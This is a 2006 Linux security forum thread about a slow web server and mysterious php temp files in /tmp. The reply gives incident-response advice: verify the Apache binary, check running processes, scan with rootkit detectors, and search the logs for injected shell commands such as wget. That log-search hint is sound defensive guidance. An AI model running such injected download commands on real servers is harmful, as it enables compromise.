LinuxQuestions.org

LinuxQuestions.org (/questions/)
-   Linux - Security (https://www.linuxquestions.org/questions/linux-security-4/)
-   -   Slow server & Mysterious files in /tmp (https://www.linuxquestions.org/questions/linux-security-4/slow-server-and-mysterious-files-in-tmp-449799/)

smshuja 05-30-2006 02:34 AM
Slow server & Mysterious files in /tmp
 
Hi All,
I have noticed that our server has become quite slow. I also noticed that as soon as i restart apache some encrypted files are generated in /tmp , with file names such as php3Gqkez, all of different sizes, and sometimes gets deleted automatically. but when i check the server load from WebHostManager everything seems normal

is there anyway i can find out which script is creating these files?

Many thanks
Shuja

Capt_Caveman 05-30-2006 07:27 AM
Who owns those files? Verify the integrity of the Apache binary itself. If you have a rpm-based system you can use rpm -V <path_to_apache>, otherwise md5sum and compare the hash versus a known good version. Also, make sure that the running version of apache is the actual one and not an alternate trojaned copy by checking the execution path with pstree or ps auxf and verify that the proper apache binary is running.

I'd also go through all of the apache logs and look for anything that looks suspicious, especially anything with shell commands in it (like wget, cd, etc). It would also be a good idea to download and install chkrootkit or rkhunter on the system and run a scan.


All times are GMT -5. The time now is 04:15 PM.